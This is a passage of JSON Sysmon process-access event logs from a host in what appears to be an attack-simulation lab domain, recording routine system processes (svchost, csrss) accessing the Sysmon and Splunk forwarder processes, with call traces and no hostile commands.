05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3033,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00105D120500}\r\nTargetProcessId: 5080\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00105D120500}","TargetProcessId":"5080","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3034,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3035,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3036,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3037,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3038,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3039,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3040,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
